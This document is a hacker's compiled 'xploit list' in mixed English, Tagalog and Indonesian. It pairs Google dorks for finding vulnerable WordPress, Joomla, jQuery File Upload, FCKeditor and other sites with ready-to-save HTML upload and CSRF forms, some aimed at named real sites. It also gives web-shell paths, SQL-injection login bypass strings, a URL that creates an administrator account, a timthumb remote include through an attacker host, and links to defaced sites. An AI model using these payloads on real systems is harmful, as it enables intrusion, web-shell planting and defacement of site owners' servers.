xploit list

1. ojs xploit
2.  
3.  
4.  
5. ===================================
6. wordpress
7.  
8. dork: /wp-admin/install.php
9.  
10. example:
11. site.com/wp-admin/install.php
12.  
13.  
14. ========================
15.  
16. dork: inurl:/wp-content/themes/project10-themes/
17.  
18. exploit script:
19. <form enctype="multipart/form-data" action="http://ogrencikariyeri.com/haber/wp-content/themes/project10-theme/functions/upload-handler.php" method="post">Please Choose a File: <input name="orange_themes" type="file" /><br/ >
20. <input type="submit" value="upload" />
21.  
22.  
23. path: http://127.0.0.1/wordpress/wp-content/uploads/year/month/up.php
24.  
25.  
26. =================================
27. need tamper
28.  
29. Exploit Title: Baruque Casa Remote File Upload Vulnerability # Google Dork: intext:Copyright Baruque Casa. # Exploit Author: Mr.T959 # Author Website : http://mr-t959.xyz # Tested on: Windows 7 -------------------------------------- # Exploit HTML Code :
30. dork: inurl admin upload_file asp
31.  
32.  
33. <form method='post' target='_blank' action='http://www.baruquecasa.com.br/admin/server/php/' enctype='multipart/form-data'> <input type='file' name='files[]'><input type='submit' name='g' value='Upload Cok!'></form>
34.  
35.  
36. # Exploit admin/server/php/ # Successful {"files[{"name":"b6fa0f07f57514815d1b310a6b97d70e.jpeg","size":5362,"type":"image\/jpeg","url":"http:\/\/www.baruquecasa.com.br\/admin\/server\/php\/fotos\/b6fa0f07f57514815d1b310a6b97d70e.jpeg" # Error {"files":[{"name":"geo.php","size":3468,"type":"application\/octet-stream","error":"Filetype not allowed"}]} # Demo http://www.baruquecasa.com.br/admin/server/php/
37.  
38. ==================================
39. #Exploit Author:- HACKER WAHAB
40. #Author Website:-HTTP://WWW.HACKERWAHAB.COM/
41. #Exploit Title: Exploit Wordpress Arbitrary File Upload Vulnerability in Vertical SlideShow
42. #Category: webapps
43. #Google Dork : inurl:/wp-content/plugins/wp-vertical-gallery/
44. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!Exploit!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
45. Save it as .html and Run See Video ;)
46.  
47. Code:-
48. <html>
49. <body>
50. <form action="http://www.sparkdesign.com/wp-admin/admin.php?page=vertical_manage" method="POST" enctype="multipart/form-data">
51. <input type="hidden" name="task" value="vrt_add_new_album" />
52. <input type="hidden" name="album_name" value="Arbitrary File Upload" />
53. <input type="hidden" name="album_desc" value="Arbitrary File Upload" />
54. <input type="file" name="album_img" value="" />
55. <input type="submit" value="Submit" />
56. </form>
57. </body>
58. </html>
59. ==================================
60.  
61. jquery xploit
62.  
63. By Clash Hackers:
64. jquery file upload vulnerability:
65. Dork : /assets/global/plugins/jquery-file-upload/
66.  
67. Exploit : http://localhost/assets/global/plugins/jquery-file-upload/server/php/
68.  
69. Script CSRF :
70. <form method="POST" action="http://localhost/assets/global/plugins/jquery-file-upload/server/php/"
71. enctype="multipart/form-data">
72. <input type="file" name="files[]" /><button>Upload</button>
73. </form>
74.  
75. #Clash_Hackers
76.  
77. www.fb.com/Clash.Hackers.page
78. ==================================
79. csrf xploit working
80.  
81. xploiter: /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
82.  
83. xploit uploader:
84.  
85. <DOCTYPE! html>
86. <html> <form name="f" method="post" enctype="multipart/form-data" action="https://copypaste.ph/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td>Nueva imagen:</td> <td><input name="file" type="file" size="30"></td> <td align="right"> <input type="submit" name="submit" value="Transferir"> </td> </tr> </table> </form> </td> </tr> <tr> <td>&nbsp;</td> </tr> </table> </body> </html>
87.  
88.  
89. ====================
90. CSRF XPLOIT
91.  
92.  
93. <form name="myform" method="post"
94. action="http://localhost/zeuscart-master/admin/?do=adminprofile&action=update"
95. enctype="multipart/form-data">
96. <input type="hidden" name="admin_name" value="admin2">
97. <input type="hidden" name="admin_email" value="admin2@example.com">
98. <input type="hidden" name="admin_password" value="admin">
99. </form>
100. <script>document.myform.submit();</script>
101.  
102. =================================
103.  
104. Exploit Title: CSRF Vulnerability (Tinymce plugins imgsurfer) Version: 4.1.2 Date: 1-01-2018 Tested on: Linux Google Dork: inurl:/tinymce/plugins/imgsurfer/ Video Poc:https://www.youtube.com/watch?v=pL-0-fmDVCE&t=213s Category: webapps Exploit Author: Legion BOmb3r contact:esquad87@gmail.com Greetz to my team ErrOr SquaD https://www.tinymce.com/ ################################################## Description The vulnerability allows an attacker upload shell ..... Proof of Concept: http://www.site.com/tinymce/plugins/imgsurfer/main.php CSRF code:
105.  
106.  
107. <DOCTYPE! html>
108. <html> <form name="f" method="post" enctype="multipart/form-data" action="http://www.site.com/tinymce/plugins/imgsurfer/main.php"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td>Nueva imagen:</td> <td><input name="file" type="file" size="30"></td> <td align="right"> <input type="submit" name="submit" value="Transferir"> </td> </tr> </table> </form> </td> </tr> <tr> <td>&nbsp;</td> </tr> </table> </body> </html>
109. ==================================
110.  
111. Google dork: inurl:/wp-content/plugins/viral-optins/
112.  
113. Exploit: https://127.0.0.1/wp/wp-content/plugins/viral-optins/api/uploader/file-uploader.php
114.  
115. =========================
116.  
117. <form method="POST" action="https://127.0.0.1/wp/wp-content/plugins/viral-optins/api/uploader/file-uploader.php" enctype="multipart/form-data" >
118. <input type="file" name="Filedata"></center><br>
119. <input type="submit" name="Submit" value="Upload">
120. </form>
121.  
122. ==================================
123. Dork : /index.php/index/user/register
124. : /index.php/index/user/register stain
125. -----------------------------------
126. Exploit : /index.php/index/user/register
127. -----------------------------------
128. Path Shell : /files/journals/1/articles/(ID)/submission/original/(Random nama shell .phtml)
129.  
130. ==================================
131. dork
132. inurl:admin/fckeditor site:pl
133.  
134. http://alexan.com.ph/mailinglist_new/admin/FCKeditor/editor/filemanager/browser/default/browser.html?
135.  
136. idugtong sa browser.htl connector=connectors/asp/connector.php
137.  
138. ==================================
139.  
140. xploit: /sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx
141.  
142. dork: inurl:"/sitefinity/login.aspx"
143.  
144.  
145. ==================================
146.  
147. dork: inurl:/plugins/imageuploader/
148.  
149. lagay lang sa dulo ng site
150.  
151. ●
152. /assets/js/plugins/ckeditor/plugins/imageuploader/imgbrowser.php
153.  
154.  
155.  
156.  
157. +++++++++++++××++×××+××+××××××××××+
158. wp xploit
159.  
160. 1.ilagay lng sa dulo ng site ung
161. ● /post-a-job/
162.  
163. dork: inurl: wp-content/upload/job-manager-uploads/
164.  
165. sample:https://unhrd.org/post-a-job/
166.  
167.  
168. ++++++++++++++++++++++++++++++++++
169. #Exploit Author:- HACKER WAHAB
170. #Author Website:-HTTP://WWW.HACKERWAHAB.COM/
171. #Exploit Title: Exploit Wordpress Arbitrary File Upload Vulnerability in Vertical SlideShow
172. #Category: webapps
173. #Google Dork : inurl:/wp-content/plugins/wp-vertical-gallery/
174. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!Exploit!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
175. Save it as .html and Run See Video ;)
176.  
177. Code:-
178. <html>
179. <body>
180. <form action="http://www.sparkdesign.com/wp-admin/admin.php?page=vertical_manage" method="POST" enctype="multipart/form-data">
181. <input type="hidden" name="task" value="vrt_add_new_album" />
182. <input type="hidden" name="album_name" value="Arbitrary File Upload" />
183. <input type="hidden" name="album_desc" value="Arbitrary File Upload" />
184. <input type="file" name="album_img" value="" />
185. <input type="submit" value="Submit" />
186. </form>
187. </body>
188. </html>
189.  
190.  
191.  
192.  
193. +++++++++++++++++++++++++++++++
194. dork:inurl:"/?q=contacto" site:gob.ar
195.  
196.  
197.  
198. path: /sites/default/files/webform/yunghtmlmo.html
199. +++++++++++++++++++++++++++++++++
200.  
201. zap xploit use tamper data
202.  
203. Inurl: /wp-content/plugins/woocommerce-product-options/includes/image-upload.php
204.  
205. ++++++++++++++++++++++++++++++++
206. dork:
207. ●inurl:/wp-content/themes/purevision/sliders/
208. ● inurl:/wp-content/themes/purevision/sliders/
209.  
210. Exploit : /wp-content/themes/purevision/scripts/admin/uploadify/uploadify.php 
211.  
212.  
213. ++++++++++++++++++++++++++++++++1
214. Dork :
215. - inurl:/admin/login.php
216. - inurl:/administrator/ intitle:login
217. - inurl:/admin/ intitle:panel
218.  
219.  
220. test: http://www.lenovoshowroomtelangana.in/administrator/
221.  
222. bypass admin
223. bypass admin:
224. Username : '=''or' atau '=' 'or'
225. Password : '=''or' atau '=' 'or'
226.  
227.  
228.  
229. ++++++++++++++++++++++++++++++++++
230. Dork = inurl:wp-content/themes/qaengine
231.  
232. Exploit = /wp-admin/admin-ajax.php?action=ae-sync-user&method=create&user_login=username&user_pass=password&role=administrator
233.  
234.  
235. ++++++++++++++++++++++++++++++++++
236. admin/FCKeditor/ xploit working
237.  
238. xploiter: site.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
239.  
240. dork: inurl:advert_detail.php?id=
241. path: site.com/files/clownsec.html
242.  
243. ++++++++++++++++++++++++++++++++++
244. Joomla xploit working
245.  
246. dork: inurl:viewtable?cid= site:it
247.  
248. lagay mo sa link nasa baba
249. /index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0&Itemid=0
250.  
251.  
252. path: site.com/media/shell.html
253.  
254.  
255.  
256. +++++++++++++++++++++++++++++++++
257. elfinder/files xploit
258.  
259. dork: inurl: "elfinder/files"
260.  
261. xploiter: http://www.simplifieddigitalmarketing.com/asu.php
262.  
263.  
264.  
265.  
266. ++++++++++++++++++++++++++++++++++
267. Timthumb exploit working
268.  
269. vul version 1.30
270.  
271. dork: inurl:/timthumb.php?src=
272.  
273. 1.find timthumb.php source
274. 2.site.com/timthumb.php
275.  
276. ?src=http://flickr.com.phuoclongcomputer.com/up.php
277.  
278.  
279.  
280. ++++++++++++++++++++++++++++++++++
281. Arbitrary exploit
282.  
283. Save the file as html :) Exploit Title: Arbitrary File Upload Vulnerability in Estatik <br>
284. Dork : inurl:/wp-content/plugins/estatik/
285. <br> <br> Exploit : <br><hr>
286.  
287. <html> <body> <form action="www.TARGET.com/wp-admin/admin-ajax.php" method="POST" enctype="multipart/form-data"> <input type="hidden" name="action" value="es_prop_media_images" /> <input type="file" name="es_media_images[]" /> <input type="submit" value="Submit" /> </form> </body> </html>
288.  
289. ++++++++++++++++++++++++++++++++++
290. working
291. # Google Dork : inurl:/wp-content/plugins/wp-dreamworkgallery/
292.  
293. shell path:/wp-content/uploads/dreamwork/7_uploadfolder/big/shellname.php
294.  
295. exploit
296. <html>
297. <body>
298. <form action="http://www.site.com/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data">
299. <input type="hidden" name="task" value="drm_add_new_album" />
300. <input type="hidden" name="album_name" value="Arbitrary File Upload" />
301. <input type="hidden" name="album_desc" value="Arbitrary File Upload" />
302. <input type="file" name="album_img" value="" />
303. <input type="submit" value="Submit" />
304. </form>
305. </body>
306. </html>
307.  
308. ++++++++++++++++++++++++++++++++++
309. dork: inurl: /wp-content/plugins/Tevolution/tmplconnector/monitize/templatic-custom_fields/Demo
310.  
311.  
312. <form
313. action="http://site.com/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php"
314. method="post"
315. enctype="multipart/form-data">
316. <label for="file">Filename:</label>
317. <input type="file" name="Filedata" ><br>
318. <input type="submit" name="submit" value="Upload">
319. </form>
320.  
321. ++++++++++++++++++++++++++++++++++
322.  
323. ++++++++++++++++++++++++++++++++++
324.  
325.  
326. Joomla Arbitrary File Upload Vulnerability
327.  
328. # 1:Search Google Dork and Choose a Target
329. Dork : inurl:viewtable?cid= site:it
330. # 2: exploit:
331. /index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0&Itemid=0
332. # 3: upload shell.php or index.html
333. # 4: Poc: http://www.localhost.com/media/index.... or http://www.localhost.com/media/shell.php
334. Demo :
335. http://www.aquoschemical.it/sito/medi...
336. http://www.centroolisticoitaliano.it/...
337.  
338. CONTACT ME:
339. https://web.facebook.com/FOXILITRIX.0
340.  
341. http://www.ghostshockey.it/media/r3dfl4g.html
342. http://www.nordnetimmobiliare.it/media/r3dfl4g.html
343.  
344. https://mirror-h.org/zone/1504323/
345.  
346. ~R3DFL4G~
347.  
348. ++++++++++++++++++++++++++++++++++